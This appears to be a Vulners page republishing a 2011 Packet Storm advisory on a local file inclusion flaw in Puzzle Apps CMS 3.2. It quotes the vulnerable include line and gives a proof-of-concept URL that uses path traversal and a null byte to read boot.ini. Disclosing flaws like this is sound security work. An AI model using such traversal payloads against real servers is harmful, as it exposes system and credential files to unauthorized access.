Lucene search
K

Puzzle Apps CMS 3.2 Local File Inclusion

🗓️ 30 May 2011 00:00:00Reported by Treasure PriyamalType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Puzzle Apps CMS 3.2 Local File Inclusion vulnerability discovered in 2011 allows unauthorized access to system files through include_once function in loader.config.php

Code
`# ------------------------------------------------------------------------  
# Software................ Puzzle Apps CMS 3.2  
# Vulnerability........... Local File Inclusion   
# Site.................... http://www.puzzleapps.org/  
# Download Link........... http://sourceforge.net/projects/puzzlecms/files/puzzlecms/Puzzle Apps CMS 3.2/puzzle-3.2.tar.gz/download  
# Discovery Date.......... 5/29/2011  
# Tested On............... Windows XPsp2 + WAMP  
# ------------------------------------------------------------------------  
# Author.................. Treasure Priyamal  
# Site.................... http://www.treasuresec.com/  
# Email................... Treasure Priyamal <[email protected]>  
# ------------------------------------------------------------------------  
#  
#  
# --Description--  
#  
# In Puzzle App CMS there are couple of the places you will be able to find   
# LFI vulns.   
#  
#  
# -- Vulnerable Source  
# include_once ($COREROOT . "config/loader.config.php");  
#  
# --Sample to LFI--  
#   
#http://localhost/puzzle/core/config.loader.php?COREROOT=[LFI]  
#  
#  
# --PoC LFI --  
#  
#http://localhost/puzzle/core/config.loader.php?COREROOT=../../../boot.ini%00  
#  
#  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation